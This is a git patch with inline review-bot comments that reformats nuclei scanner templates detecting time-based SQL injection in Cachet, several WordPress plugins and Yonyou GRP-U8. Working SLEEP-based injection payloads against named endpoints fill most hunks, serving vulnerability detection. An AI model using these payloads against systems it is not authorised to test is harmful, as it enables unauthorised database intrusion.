From a4c09b87195d3686d34ce3d69e35b9ca6ac9cb37 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sat, 22 Jun 2024 22:19:54 -0700
Subject: [PATCH] updated template format for sqli templates with timeout

---
 http/cves/2021/CVE-2021-39165.yaml     |  8 ++++---
 http/cves/2023/CVE-2023-6360.yaml      | 16 ++++++++-----
 http/cves/2023/CVE-2023-6567.yaml      |  8 ++++---
 http/cves/2024/CVE-2024-1061.yaml      |  8 ++++---
 .../wp-autosuggest-sql-injection.yaml  |  8 ++++---
 .../wordpress/wp-statistics-sqli.yaml  | 23 +++++++++++++++----
 .../yonyou/yonyou-u8-sqli.yaml         | 16 ++++++++++---
 7 files changed, 61 insertions(+), 26 deletions(-)

diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml
index b8172d9f51..280d635a49 100644
--- a/http/cves/2021/CVE-2021-39165.yaml
+++ b/http/cves/2021/CVE-2021-39165.yaml
@@ -34,9 +34,11 @@ info:
   tags: cve,cve2021,cachet,sqli,chachethq
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1
+        Host: {{Hostname}}
 
     redirects: true
     max-redirects: 2
diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml
index 49a9b9aa46..06a839dd4f 100644
--- a/http/cves/2023/CVE-2023-6360.yaml
+++ b/http/cves/2023/CVE-2023-6360.yaml
@@ -31,12 +31,14 @@ info:
     framework: wordpress
     fofa-query: '"wordpress" && body="wp-content/plugins/my-calendar"'
   tags: cve,cve2023,sqli,wp,wordpress,wpscan,wp-plugin,my-calendar,joedolson
+  flow: http(1) && http(2)
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/my-calendar/readme.txt"
+  - raw:
+      - |
+        GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: word
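Review bot: The new request line `GET /api/v1/components?... HTTP/1.1` with `Host: {{Hostname}}` drops the `{{BaseURL}}` prefix the old `path:` form carried, so a target supplied with a base path (e.g. an instance served under a sub-directory) is now requested at the host root and the check silently turns into a false negative. If that case is meant to stay covered, nuclei accepts a full URL on the raw request line, i.e. `GET {{BaseURL}}/api/v1/components?... HTTP/1.1` — worth confirming against the current engine before changing it. The same path-to-raw conversion is made in the hunks for CVE-2023-6360, CVE-2023-6567, CVE-2024-1061, wp-autosuggest-sql-injection and wp-statistics-sqli, so whichever way this is decided should apply there too. This request's matchers lie outside the hunk.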
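Review bot: The added `flow: http(1) && http(2)` appears to be indented with the `info:` keys (the diff shows it after `tags:` with a leading space, whereas the same line in wp-statistics-sqli and yonyou-u8-sqli sits at column 0); `flow` is a top-level template key, so if the indentation is as it looks the engine will not see the flow at all — the collapsed diff loses exact indentation, so please check. Separately, the readme.txt request's `- type: word` matcher carries no `internal: true`, unlike the fingerprint requests in those two sibling templates, so a match on the readme alone would presumably be reported as a finding instead of only gating http(2). Suggest `flow: http(1) && http(2)` at column 0 and `internal: true` under the word matcher. The matcher block continues outside the hunk.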
@@ -44,9 +46,11 @@ http:
         words:
           - 'My Calendar'
 
-  - method: GET
-    path:
-      - "{{BaseURL}}/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)+AND+'a'%3d'a HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml
index b4b169302e..280685922d 100644
--- a/http/cves/2023/CVE-2023-6567.yaml
+++ b/http/cves/2023/CVE-2023-6567.yaml
@@ -33,9 +33,11 @@ info:
   tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli,thimpress
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml
index 370ab6089f..51f07678f6 100644
--- a/http/cves/2024/CVE-2024-1061.yaml
+++ b/http/cves/2024/CVE-2024-1061.yaml
@@ -34,9 +34,11 @@ info:
   tags: cve,cve2024,wp,wordpress,wp-plugin,sqli,html5-video-player,bplugins
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
index 9c44aa3e9e..27ba0d61b1 100644
--- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
+++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml
@@ -15,9 +15,11 @@ info:
   tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
index f30d06d3fb..43b4b4394f 100644
--- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
+++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml
@@ -17,17 +17,30 @@ info:
     publicwww-query: /wp-content/plugins/wp-statistics/
   tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp
 
+flow: http(1) && http(2)
+
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)"
-      - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt"
+  - raw:
+      - |
+        GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - 'WP Statistics'
+        internal: true
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a) HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
           - 'duration>=6'
-          - 'contains(content_type, "text/html") && contains(body_2, "WP Statistics")'
           - 'status_code == 500'
         condition: and
diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
index b4c69fd1f6..8502df050f 100644
--- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml
@@ -15,13 +15,24 @@ info:
     fofa-query: icon_hash="-299520369"
   tags: yonyou,grp,sqli
 
+flow: http(1) && http(2)
+
+
 http:
   - raw:
       - |
         GET /login.jsp HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
+
+    matchers:
+      - type: word
+        words:
+          - 'GRP-U8'
+        internal: true
+
+  - raw:
       - |
+        @timeout: 20s
         POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
@@ -32,8 +43,7 @@ http:
       - type: dsl
         dsl:
           - 'duration_2>=6'
-          - 'status_code == 200'
-          - 'contains(content_type_2, "text/html") && contains(body_1, "GRP-U8")'
+          - 'contains(content_type, "text/html")'
         condition: and
 # digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950
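Review bot: `duration_2>=6` is kept in the second hunk while the same matcher's `content_type_2` was renamed to `content_type`; after the split in the first hunk the POST is the only request in its block, so the `_2`-suffixed values of the old two-request block presumably no longer exist and the DSL comparison can never hold, which would stop the template from detecting anything. Change it to `- 'duration>=6'` to match the renamed `content_type` on the next line. The `# digest:` line is also unchanged although the template body changed; it presumably needs re-signing with the repository's usual tooling before the template passes signature checks.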